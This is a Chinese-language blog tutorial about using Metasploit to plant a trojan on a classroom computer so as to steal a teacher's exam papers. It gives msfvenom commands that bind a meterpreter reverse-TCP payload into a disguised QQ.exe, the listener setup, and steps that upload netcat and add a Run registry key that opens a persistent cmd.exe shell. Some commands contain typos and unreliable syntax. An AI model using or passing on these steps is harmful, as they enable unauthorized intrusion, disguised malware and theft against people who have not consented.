入侵教程(黑客技术教程Msf篇之神偷木马，黑客演

每个故事的开始总是那么荒谬离奇，对于一个技术小萌新来说，因为快临近了期末考试，因为自己平时是什么样的自己心里有数（狗头）。

在某个风寒日丽的下午，我正在上着课刷着手机（了这里可不能学我），然后看到了谋篇公众号的推文，是一篇关于通过写一个木马程序，窃取老师的期末试卷的文章，此时，我心中也产生了类似的想法，嘻嘻。通过作者的思路，作者是自己写的程序，等待老师的u盘插入，然后遍历老师的u盘指定的文件格式到自己的u盘。

经过一番思考后，决定现学现用，用msf生成的小马植入教室的电脑，进而获得目标电脑的权限，这里我想到的有两种思路

1， 在上课老师来之前将小马植入电脑然后下课自动销毁，这样的作法有点危险，会有同学看到。或者入侵老师的电脑后上传nc然后进行反连。

2， 还有一种是自己的远控软件（狗头，不是本文的重点），重点是免杀。

Msf对于我们应该不陌生，重点是它怎么捆绑或者生成小马，本文介绍捆绑。我们得有一个目标软件。

然后执行命令

sfvenom -p
windows/meterpreter/reverse_tcp LHOST=192.168.44.141 -f exe -x /home/zhengai/桌面/QQ.exe -o /home/zhengai/桌面/test.exe

-p指的是使用的payload

-f 指的是输出的文件格式

-x -o 指的是输入文件路径和输出文件路径

LHOST=你自己的IP

这时可能会有帅气的读者问了，就这样裸奔吗？这样呢不怕被杀？像这样

了我们有免杀（狗头）。

如果你觉得麻烦想自己生成小马的话，思路也是一样的，只不过是直接去掉-x参数。了msf也集成了手机的payload,感兴趣可以试试哦。在实践之前我们先进行实验。

Msfconsole打开msf端

use multi/handler可以先进入模块

然后show options查看需要配置参数

这里看到只需要配置LHOST,这里有两种配置方法，可以是自己的ip，也可以是目标主机的ip的话此马只能在局域网内上线，不同的ip配置可以拿到不同的权限。这里我们直接配置目标主机的ip。

msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.44.131

set lport 4444

run

最最最重要的是目标主机要运行你的小马，在实践中你可以有很多方法让目标主机运行，看你的能力了。然后我们就可以执行命令下载文件了。下载命令是download .更多有趣的命令等着你去挖掘。这里还可以给目标主机上传nc然后这就是你的电脑了哦，我们的目标是注册表，

Upload /root/nc.exe C:\\windows\\system32

然后修改注册表键值

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

OK了现在你只需要连接即可（狗头）。

计划还是失败了，因为教室的电脑只有老师才能打开。吐血。（打字不易，大佬喷轻一点）